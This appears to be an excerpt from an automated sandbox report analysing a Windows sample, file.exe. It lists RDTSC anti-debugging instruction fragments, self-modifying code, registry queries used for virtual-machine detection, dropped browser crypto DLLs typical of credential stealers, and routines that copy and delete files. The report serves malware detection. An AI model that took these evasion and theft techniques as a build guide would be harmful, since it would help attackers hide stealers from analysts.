Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561BCC second address: 561BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561CF2 second address: 561CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561CFA second address: 561D00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561D00 second address: 561D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B74DE4450h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561D18 second address: 561D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A294h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561F96 second address: 561F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561F9C second address: 561FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561FA3 second address: 561FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562279 second address: 56227E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56253E second address: 562544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562544 second address: 56254A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56254A second address: 56254E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56254E second address: 562552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562552 second address: 56255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56EDEC second address: 56EDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56EDF2 second address: 56EDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56EDF6 second address: 56EE00 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B7530A286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56EE00 second address: 56EE0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B74DE444Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0B2 second address: 56F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F645 second address: 56F65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B74DE4452h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56FCFC second address: 56FD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57615C second address: 576174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F3B74DE4446h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577789 second address: 5777C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B7530A29Fh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3B7530A297h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F3B7530A28Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5777C5 second address: 5777C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5777C9 second address: 5777CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5777CF second address: 5777E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B74DE444Ah 0x0000000d jc 00007F3B74DE4446h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 584FE6 second address: 58500C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A291h 0x00000007 jmp 00007F3B7530A291h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 589EB3 second address: 589EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E727 second address: 58E731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3B7530A286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597F9D second address: 597FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597FA3 second address: 597FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597FA7 second address: 597FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597FAB second address: 597FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3B7530A28Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3B7530A293h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 597FD9 second address: 598005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4454h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3B74DE4452h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598005 second address: 598022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A298h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A05CC second address: 5A05D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A05D4 second address: 5A05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A05DA second address: 5A05DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A05DE second address: 5A0604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Ch 0x00000007 jmp 00007F3B7530A290h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0604 second address: 5A0608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59ED74 second address: 59ED7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59EECE second address: 59EEEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F4DC second address: 59F4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F3B7530A286h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59F4E8 second address: 59F4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B0093 second address: 5B009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B7530A286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B009F second address: 5B00AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnp 00007F3B74DE444Eh 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BEBBF second address: 5BEBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B05E0 second address: 4B05F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007F3B74DE4446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C07E9 second address: 5C07ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C07ED second address: 5C07F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C07F6 second address: 5C07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD342 second address: 5CD352 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnc 00007F3B74DE4446h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1D52 second address: 5D1D5C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B7530A286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC262 second address: 4BC26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3B74DE4446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0CB2 second address: 5D0CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0CB8 second address: 5D0CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0CBC second address: 5D0CE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3B7530A290h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B7530A295h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0CE9 second address: 5D0D08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B74DE4455h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0D08 second address: 5D0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D177B second address: 5D177F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D177F second address: 5D17A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B7530A286h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3B7530A28Fh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1A32 second address: 5D1A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F3B74DE4446h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D345C second address: 5D3462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D3462 second address: 5D347E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE444Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3B74DE444Ah 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D347E second address: 5D349B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B7530A28Ah 0x00000012 jnp 00007F3B7530A286h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4B06 second address: 5D4B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3B74DE4446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D73B2 second address: 5D73B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D73B6 second address: 5D73BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D73BC second address: 5D73C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3B7530A286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D73C7 second address: 5D73D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D73D5 second address: 5D73DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30328 second address: 4C30340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4454h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30340 second address: 4C30384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3B7530A296h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, cx 0x00000014 pushad 0x00000015 mov edx, ecx 0x00000017 mov si, 884Bh 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f call 00007F3B7530A28Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30384 second address: 4C303CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushfd 0x00000007 jmp 00007F3B74DE4457h 0x0000000c and cx, 941Eh 0x00000011 jmp 00007F3B74DE4459h 0x00000016 popfd 0x00000017 movzx esi, dx 0x0000001a popad 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C303CF second address: 4C303D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C303D5 second address: 4C303D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C303D9 second address: 4C303DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3043C second address: 4C30442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30442 second address: 4C30446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30446 second address: 4C30489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F3B74DE4456h 0x00000011 push eax 0x00000012 jmp 00007F3B74DE444Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30489 second address: 4C3048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3048D second address: 4C30491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30491 second address: 4C30497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30497 second address: 4C304EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B74DE444Fh 0x00000009 xor ecx, 21AF010Eh 0x0000000f jmp 00007F3B74DE4459h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F3B74DE444Ch 0x00000020 mov dx, cx 0x00000023 pop esi 0x00000024 mov cx, di 0x00000027 popad 0x00000028 pop ebp 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov ecx, edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30B65 second address: 4C30BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ch, 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F3B7530A295h 0x00000017 add ax, 2326h 0x0000001c jmp 00007F3B7530A291h 0x00000021 popfd 0x00000022 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 35175A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4F3067 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 51B5A2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 578B9D instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00104910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00104910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000FDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000FE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000FBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00103EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00103EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000FF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000F16D0
